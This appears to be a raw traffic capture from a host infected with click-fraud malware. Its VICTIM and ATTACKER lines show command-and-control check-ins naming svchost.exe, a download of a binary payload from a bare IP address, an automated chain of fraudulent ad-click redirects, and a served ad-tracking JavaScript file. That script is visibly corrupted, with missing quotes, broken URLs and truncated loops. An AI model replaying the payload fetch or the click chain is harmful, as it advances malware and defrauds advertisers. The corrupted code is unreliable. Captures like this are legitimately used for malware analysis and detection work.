Client: GET /search/portal.php?ref=175 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive


VICTIM:  	GET /search/portal.php?ref=175 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive 
ATTACKER:	GET /search/index.php?terms=online+affiliate+programs&ref=175 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/www.sellbloom.com/search/portal.php?ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive 
ATTACKER:	GET /search/assets/css/base_grass.css HTTP/1.0Accept: */*Referer: http:/www.sellbloom.com/search/index.php?terms=online+affiliate+programs&ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive 
ATTACKER:	GET /search/ HTTP/1.0Accept: */*Referer: http:/www.sellbloom.com/search/index.php?terms=online+affiliate+programs&ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive 
VICTIM:  	\000\000x\343 
VICTIM:  	\000\000({\000\000\000\217192.168.1.248-12_04:01|_8710901.exe_199_06121206x_02_03:54_12_04:01_Pe0.Bta1._Pe0.Bt0..yyy.xxx_Bt06121206a_BtwSvc__so__ConnectedTJ|x|ucsp0416 
VICTIM:  	\000\000x\343 
VICTIM:  	\000\000'\263\000\000\000\0302.0_ucsp0416_svchost.exe 
ATTACKER:	GET /p0330/2.0/w.bin?134930 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 64.79.86.26Connection: Keep-Alive 
ATTACKER:	GET /search/clk.php?u=aHR0cCUzQSUyRiUyRjg0M18xMDIxLmNsaWNrc3ZhbGlkYXRlLmNvbSUyRnJlZGlyZWN0LnBocCUzRmNsY2tfZGF0YSUzRFYwQmNUR05hQ2hNc0ZoeGtVSHRWS2xkVUZoSUNVWHBYYkVZYklnUnNVQThBQlFZRWRGOEhJR3hIYVRzV0lrWjVCMWhRU21OYUNsVjVOMjRTUjNwU2VYSnhjQlZ6VUEwbkNrSVZZekVOSjNvQUFYZGxBbEYlMjUyRlZnMHdhV0JCZXlBSWNnUUxFSE5jZWxOeFJ4OGVPZ1pSZVFJQUJoRjBYWHRVQmdFR0VRa21BVkp4Um1rVk1YaFNlSFYyZHhsM1d3b2dEVVVaWXpZS0lIMEpCUXNVY2w1MlYzczNiaEpFZUZSNmRYWjNFQVVxRFZWNFFCd1ZNUTFTQ0hKeFNVOGpIU3dCS2l0Zk5ocyUyNTJGR2oxQ1FWMTFFajE4Vm5wR0dHRkhmVlo3QmdFR0VXTmFEd3NuR0VRJTI1MkZFR3hSZmdOd1VrY2dBQ0lOS0FCSWRFZDhVUWxCUUZ4R05BZ2pGdyUyNTNEJTI1M0R8MC4wM3x8YWRtaW58fDE3NXww HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/www.sellbloom.com/search/index.php?terms=online+affiliate+programs&ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive 
ATTACKER:	GET /redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3D HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/www.sellbloom.com/search/clk.php?u=aHR0cCUzQSUyRiUyRjg0M18xMDIxLmNsaWNrc3ZhbGlkYXRlLmNvbSUyRnJlZGlyZWN0LnBocCUzRmNsY2tfZGF0YSUzRFYwQmNUR05hQ2hNc0ZoeGtVSHRWS2xkVUZoSUNVWHBYYkVZYklnUnNVQThBQlFZRWRGOEhJR3hIYVRzV0lrWjVCMWhRU21OYUNsVjVOMjRTUjNwU2VYSnhjQlZ6VUEwbkNrSVZZekVOSjNvQUFYZGxBbEYlMjUyRlZnMHdhV0JCZXlBSWNnUUxFSE5jZWxOeFJ4OGVPZ1pSZVFJQUJoRjBYWHRVQmdFR0VRa21BVkp4Um1rVk1YaFNlSFYyZHhsM1d3b2dEVVVaWXpZS0lIMEpCUXNVY2w1MlYzczNiaEpFZUZSNmRYWjNFQVVxRFZWNFFCd1ZNUTFTQ0hKeFNVOGpIU3dCS2l0Zk5ocyUyNTJGR2oxQ1FWMTFFajE4Vm5wR0dHRkhmVlo3QmdFR0VXTmFEd3NuR0VRJTI1MkZFR3hSZmdOd1VrY2dBQ0lOS0FCSWRFZDhVUWxCUUZ4R05BZ2pGdyUyNTNEJTI1M0R8MC4wM3x8YWRtaW58fDE3NXwwAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comConnection: Keep-Alive 
ATTACKER:	GET /js/tools.js?1276344097 HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comConnection: Keep-AliveCookie: finditquick=192.168.1.175.1276344097088917 
ATTACKER:	GET /design/preloading.gif HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comConnection: Keep-AliveCookie: finditquick=192.168.1.175.1276344097088917 
ATTACKER:	GET /conversion.php?JumpToID=94269431941211&Keyword=affiliate_program&Affiliate=843&Pub=94895026 HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.findit-quick.comConnection: Keep-Alive 
ATTACKER:	GET /conversion.php?JumpToID=94269431941211&Keyword=affiliate_program&Affiliate=843&Pub=94895026 HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.finditquick.comConnection: Keep-Alive 
VICTIM:  	POST /local.php?clck_data=ZkFbBZRZnJvbT13ZWIxNSZhZmY9ODQzJnNxPTE3NSZJRD1qY2smamNrPTEwQ0NDMjMxMkNDQzQ1OUNDQzY4MkRERDExM0RERDgxMkRERDE0MkNDQzY4MTU1NDc4MzJPT08yMjMyNTAyNDUwNzM1ME9PTzY4MkRERDExM0RERDgxMkRERDE0MkNDQzY4Nzg1NDc4MzJDQ0MxMTcxREREMUNDQzExNDFEREQxQ0NDem5ldGJlY19yZ252eXZzc25UVFQyMjMyNTAyNDUwNzM1MDpvbmxpbmUlMkJhZmZpbGlhdGUlMkJwcm9ncmFtcyZ0aW1lc3RhbXA9MTI3NjM0NDA5NyZSZWZlcnJpbmc9aHR0cCUzQSUyRiUyRnd3dy5zZWxsYmxvb20uY29tJTJGc2VhcmNoJTJGY2xrLnBocCUzRnUlM0RhSFIwY0NVelFTVXlSaVV5UmpnME0xOHhNREl4TG1Oc2FXTnJjM1poYkdsa1lYUmxMbU52YlNVeVJuSmxaR2x5WldOMExuQm9jQ1V6Um1Oc1kydGZaR0YwWVNVelJGWXdRbU5VUjA1aFEyaE5jMFpvZUd0VlNIUldTMnhrVlVab1NVTlZXSEJZWWtWWllrbG5Vbk5WUVRoQlFsRlpSV1JHT0VoSlIzaElZVlJ6VjBscldqVkNNV2hSVTIxT1lVTnNWalZPTWpSVFVqTndVMlZZU25oalFsWjZWVUV3YmtOclNWWlpla1ZPU2pOdlFVRllaR3hCYkVZbE1qVXlSbFpuTUhkaFYwSkNaWGxCU1dOblVVeEZTRTVqWld4T2VGSjRPR1ZQWjFwU1pWRkpRVUpvUmpCWVdIUlZRbWRGUjBWUmEyMUJWa3A0VW0xclZrMVlhRk5sU0ZZeVpIaHNNMWQzYjJkRVZWVmFXWHBaUzBsSU1FcENVWE5WWTJ3MU1sWXpjek5pYUVwRlpVWlNObVJZV2pORlFWVnhSRlpXTkZGQ2QxWk5VVEZUUTBoS2VGTlZPR3BJVTNkQ1MybDBaazVvY3lVeU5USkdSMm94UTFGV01URkZhakU0Vm01d1IwZEhSa2htVmxvM1FtZEZSMFZYVG1GRWQzTnVSMFZSSlRJMU1rWkZSM2hTWm1kT2QxVnJZMmRCUTBsT1MwRkNTV1JGWkRoVlVXeENVVVo0UjA1QloycEdkeVV5TlRORUpUSTFNMFI4TUM0d00zeDhZV1J0YVc1OGZERTNOWHd3JnZhbGlkPXA1ZEk5RiZqY2tpZD0w1267&pw=390&ph=296&pl=0&pt=0&sx=374&sy=296 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/843_1021.clicksvalidate.com/redi 
VICTIM:  	rect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comContent-Length: 0Connection: Keep-AlivePragma: no-cacheCookie: finditquick=192.168.1.175.1276344097088917 
ATTACKER:	GET /?pid=1200&src=843_1021&keywords=affiliate+program HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: shop-iw.forless.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
ATTACKER:	GET /IA.jsh?pid=5400.117&subid=forless.com HTTP/1.0Accept: */*Referer: http:/shop-iw.forless.com/?pid=1200&src=843_1021&keywords=affiliate+programAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: js.worthathousandwords.comConnection: Keep-Alive 
ATTACKER:	GET /tpl/1/text_zilla/images/style.css HTTP/1.0Accept: */*Referer: http:/shop-iw.forless.com/?pid=1200&src=843_1021&keywords=affiliate+programAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: shop-iw.forless.comConnection: Keep-AliveCookie: PHPSESSID=u1a7qkk3ib7skdjhov7or0akp5; cookieID=1276344103.547472.688020.191624 
ATTACKER:	HTTP/1.0 200 OKContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.0X-AspNet-Version: 2.0.50727X-Powered-By: ASP.NETCache-Control: private, max-age=7200Date: Sat, 12 Jun 2010 12:01:45 GMTContent-Length: 18794Connection: keep-alive\tvar PropertyID = '5400.117';\tvar IA_SubID = 'forless.com';/\tTrack all requests that have our JavaScript even the page without ads\tvar yImg = new Image(1,1);\tyImg.src = 'http:/iar.worthathousandwords.com/iar.gif?key=global&pid=' + PropertyID + '&ia_subid=' + IA_SubID + '&ia_js_url=' + document.URL + '&ia_js_ref=' + document.referrer;/\tEnd of code\tfunction CleanQuote(ss)\t{\t    var r1,r2,r3,re1,re2,re3; \t    re1 = /\\'/ig;\t    r1 = ss.replace(re1, \'\);\t\t\t    re2 = /\\<\\\\>/ig;\t    r3 = r2.replace(re3, \»\);\t\t\t    return(r3); \t}\t/*\t * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message\t * Digest Algorithm, as defined in RFC 1321.\t * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002.\t * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet\t * Distributed under the BSD License\t * See http:/pajhome.org.uk/crypt/md5 for more info.\t */\tvar hexcase = 1;  /* hex output format. 0 - lowercase; 1 - uppercase        */\tvar b64pad  = \=\; /* base-64 pad character. \=\ for strict RFC compliance   */\tvar chrsz   = 8;  /* bits per input chara 
ATTACKER:	cter. 8 - ASCII; 16 - Unicode      */\tfunction hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}\tfunction b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));}\tfunction str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));}\tfunction hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); }\tfunction b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); }\tfunction str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); }\t/* \t * Perform a simple self-test to see if the VM is working \t */\tfunction md5_vm_test()\t{\t  return hex_md5(\abc\) == \900150983cd24fb0d6963f7d28e17f72\;\t}\t/*\t * Calculate the MD5 of an array of little-endian words, and a bit length\t */\tfunction core_md5(x, len)\t{\t  /* append padding */\t  x[len >> 5] |= 0x80 << ((len) % 32);\t  x[(((len + 64) >>> 9) << 4) + 14] = len;\t  \t  var a =  1732584193;\t  var b = -271733879;\t  var c = -1732584194;\t  var d =  271733878;\t  for(var i = 0; i < x.length; i += 16)\t  {\t\tvar olda = a;\t\tvar oldb = b;\t\tvar oldc = c;\t\tvar oldd = d;\t \t\ta = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);\t\td = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);\t\tc = md5_ff(c, d, a, b, x[i+ 2], 17,  606105819);\t\tb = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);\t\ta = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);\t\td = md5_ff(d, a, b, c, x[i+ 5], 12 
ATTACKER:	,  1200080426);\t\tc = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);\t\tb = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);\t\ta = md5_ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);\t\td = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);\t\tc = md5_ff(c, d, a, b, x[i+10], 17, -42063);\t\tb = md5_ff(b, c, d, a, x[i+11], 22, -1990404162);\t\ta = md5_ff(a, b, c, d, x[i+12], 7 ,  1804603682);\t\td = md5_ff(d, a, b, c, x[i+13], 12, -40341101);\t\tc = md5_ff(c, d, a, b, x[i+14], 17, -1502002290);\t\tb = md5_ff(b, c, d, a, x[i+15], 22,  1236535329);\t\ta = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);\t\td = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);\t\tc = md5_gg(c, d, a, b, x[i+11], 14,  643717713);\t\tb = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);\t\ta = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);\t\td = md5_gg(d, a, b, c, x[i+10], 9 ,  38016083);\t\tc = md5_gg(c, d, a, b, x[i+15], 14, -660478335);\t\tb = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);\t\ta = md5_gg(a, b, c, d, x[i+ 9], 5 ,  568446438);\t\td = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);\t\tc = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);\t\tb = md5_gg(b, c, d, a, x[i+ 8], 20,  1163531501);\t\ta = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);\t\td = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);\t\tc = md5_gg(c, d, a, b, x[i+ 7], 14,  1735328473);\t\tb = md5_gg(b, c, d, a, x[i+12], 20, -1926607734);\t\ta = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);\t\td = md5_hh(d, a, b, c, x[i+ 8], 
ATTACKER:	 11, -2022574463);\t\tc = md5_hh(c, d, a, b, x[i+11], 16,  1839030562);\t\tb = md5_hh(b, c, d, a, x[i+14], 23, -35309556);\t\ta = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);\t\td = md5_hh(d, a, b, c, x[i+ 4], 11,  1272893353);\t\tc = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);\t\tb = md5_hh(b, c, d, a, x[i+10], 23, -1094730640);\t\ta = md5_hh(a, b, c, d, x[i+13], 4 ,  681279174);\t\td = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);\t\tc = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);\t\tb = md5_hh(b, c, d, a, x[i+ 6], 23,  76029189);\t\ta = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);\t\td = md5_hh(d, a, b, c, x[i+12], 11, -421815835);\t\tc = md5_hh(c, d, a, b, x[i+15], 16,  530742520);\t\tb = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);\t\ta = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);\t\td = md5_ii(d, a, b, c, x[i+ 7], 10,  1126891415);\t\tc = md5_ii(c, d, a, b, x[i+14], 15, -1416354905);\t\tb = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);\t\ta = md5_ii(a, b, c, d, x[i+12], 6 ,  1700485571);\t\td = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);\t\tc = md5_ii(c, d, a, b, x[i+10], 15, -1051523);\t\tb = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);\t\ta = md5_ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);\t\td = md5_ii(d, a, b, c, x[i+15], 10, -30611744);\t\tc = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);\t\tb = md5_ii(b, c, d, a, x[i+13], 21,  1309151649);\t\ta = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);\t\td = md5_ii(d, a, b, c, x[i 
ATTACKER:	+11], 10, -1120210379);\t\tc = md5_ii(c, d, a, b, x[i+ 2], 15,  718787259);\t\tb = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);\t\ta = safe_add(a, olda);\t\tb = safe_add(b, oldb);\t\tc = safe_add(c, oldc);\t\td = safe_add(d, oldd);\t  }\t  return Array(a, b, c, d);\t  \t}\t/*\t * These functions implement the four basic operations the algorithm uses.\t */\tfunction md5_cmn(q, a, b, x, s, t)\t{\t  return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b);\t}\tfunction md5_ff(a, b, c, d, x, s, t)\t{\t  return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);\t}\tfunction md5_gg(a, b, c, d, x, s, t)\t{\t  return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);\t}\tfunction md5_hh(a, b, c, d, x, s, t)\t{\t  return md5_cmn(b ^ c ^ d, a, b, x, s, t);\t}\tfunction md5_ii(a, b, c, d, x, s, t)\t{\t  return md5_cmn(c ^ (b | (~d)), a, b, x, s, t);\t}\t/*\t * Calculate the HMAC-MD5, of a key and some data\t */\tfunction core_hmac_md5(key, data)\t{\t  var bkey = str2binl(key);\t  if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz);\t  var ipad = Array(16), opad = Array(16);\t  for(var i = 0; i < 16; i++) \t  {\t\tipad[i] = bkey[i] ^ 0x36363636;\t\topad[i] = bkey[i] ^ 0x5C5C5C5C;\t  }\t  var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);\t  return core_md5(opad.concat(hash), 512 + 128);\t}\t/*\t * Add integers, wrapping at 2^32. This uses 16-bit operati 
ATTACKER:	ons internally\t * to work around bugs in some JS interpreters.\t */\tfunction safe_add(x, y)\t{\t  var lsw = (x & 0xFFFF) + (y & 0xFFFF);\t  var msw = (x >> 16) + (y >> 16) + (lsw >> 16);\t  return (msw << 16) | (lsw & 0xFFFF);\t}\t/*\t * Bitwise rotate a 32-bit number to the left.\t */\tfunction bit_rol(num, cnt)\t{\t  return (num << cnt) | (num >>> (32 - cnt));\t}\t/*\t * Convert a string to an array of little-endian words\t * If chrsz is ASCII, characters >255 have their hi-byte silently ignored.\t */\tfunction str2binl(str)\t{\t  var bin = Array();\t  var mask = (1 << chrsz) - 1;\t  for(var i = 0; i < str.length * chrsz; i += chrsz)\t\tbin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32);\t  return bin;\t}\t/*\t * Convert an array of little-endian words to a string\t */\tfunction binl2str(bin)\t{\t  var str = \\;\t  var mask = (1 << chrsz) - 1;\t  for(var i = 0; i < bin.length * 32; i += chrsz)\t\tstr += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);\t  return str;\t}\t/*\t * Convert an array of little-endian words to a hex string.\t */\tfunction binl2hex(binarray)\t{\t  var hex_tab = hexcase ? \0123456789ABCDEF\ : \0123456789abcdef\;\t  var str = \\;\t  for(var i = 0; i < binarray.length * 4; i++)\t  {\t\tstr += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +\t\t\t   hex_tab.charAt((binarray[i>>2] >> ((i%4)*8  )) & 0xF);\t  }\t  return str;\t}\t/*\t * C 
ATTACKER:	onvert an array of little-endian words to a base-64 string\t */\tfunction binl2b64(binarray)\t{\t  var tab = \ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\;\t  var str = \\;\t  for(var i = 0; i < binarray.length * 4; i += 3)\t  {\t\tvar triplet = (((binarray[i   >> 2] >> 8 * ( i   %4)) & 0xFF) << 16)\t\t\t\t\t| (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )\t\t\t\t\t|  ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);\t\tfor(var j = 0; j < 4; j++)\t\t{\t\t  if(i * 8 + j * 6 > binarray.length * 32) str += b64pad;\t\t  else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);\t\t}\t  }\t  return str;\t}\t\t/ JScript source codevar EncDec ={    mPassw : \\,        init : function ()    {        mPassw = \6394715\;    },    setPassw : function (pPassw)    {        mPassw = pPassw;    },        doEncode : function (pTxt)    {        if(mPassw=='')\t\t\treturn encodeURIComponent(pTxt);        var i,c=0,lBuff='';        var re;        for(i=0;i%27 and (->%28 and )->%29 and \->%22 and +->%2B        re=new RegExp(\'\, \g\);    lBuff=lBuff.replace(re,\%27\);        re=new RegExp('\\', \g\);\tlBuff=lBuff.replace(re, \%22\);        lBuff=lBuff.replace(/\\+/g, \%2B\);        lBuff=lBuff.replace(/\\(/g, \%28\);        lBuff=lBuff.replace(/\\)/g, \%29\);        return lBuff;    },    doDecode : function (pTxt)    {        pTxt = decodeURIComponent(pTxt);        if(mPassw=='')\t\t\treturn pTxt;        var i,c=0,lBuff='';        for(i=0;i]*V?>/g;\t\t\tif(lDiv.innerHTML 
ATTACKER:	 != undefined)\t\t\t{\t\t\t\ttextNoTags = lDiv.innerHTML.replace(reTag,\\);\t\t\t}\t\t\telse\t\t\t{\t\t\t\ttextNoTags = text.replace(reTag,\\);\t\t\t}\t\t}\t\treturn textNoTags;\t}\t\tfunction CleanAdvertiserName(advertiser)\t{\t\tif (advertiser == null || advertiser == '' || advertiser.length == 0) return '';\t\tadvertiser=CleanTags(advertiser);\t\tvar regex = new RegExp('http:/|https:/|ww1[\\.]|ww2[\\.]|www[\\.]','gi');\t\tadvertiser = advertiser.replace(regex,'');\t\tvar x = advertiser.indexOf('/');\t\tif(x != -1){\t\t\tadvertiser = advertiser.substring(0,x);\t\t}\t\tx = advertiser.indexOf('?');\t\tif(x != -1){\t\t\tadvertiser = advertiser.substring(0,x);\t\t}\t\treturn advertiser.toLowerCase();\t}\tfunction CleanTitleDescription(title)\t{\t\tif (title == null || title == '' || title == ' ' || title.length == 0) return '';\t\tvar spaceCharacters = new Array('\\?', '%',  '#',  '\\&', '|', '!', '\\+', '\\^', '~', '\\\\',  '{', '}', '\\[', '\\]', '=', '<', '>', '/', ';', ':', '@', '\\.', '\', '(', ')', '\\*', '_', ',');\t\tvar nullCharacters = new Array('-', '\\\$', '`', \'\  , '\227'/*8212*/, '\226'/*8211*/ );\t\tvar titles = new Array();\t\tif(title != ''){\t\t\tvar original = title;\t\t\t\t\t\tvar tt = titles[title];\t\t\tif(tt && tt != ''){\t\t\t\treturn tt;\t\t\t}\t\t\t\t\t\ttitle = unescape(title.toLowerCase());\t\t\ttitle = CleanTags(title);\t\t\ttitle = title.replace(\'\,\'\);\t\t\tfor(var i = 0; i < spaceCharacters.length; i++){\t\t\t\twhile(title.index 
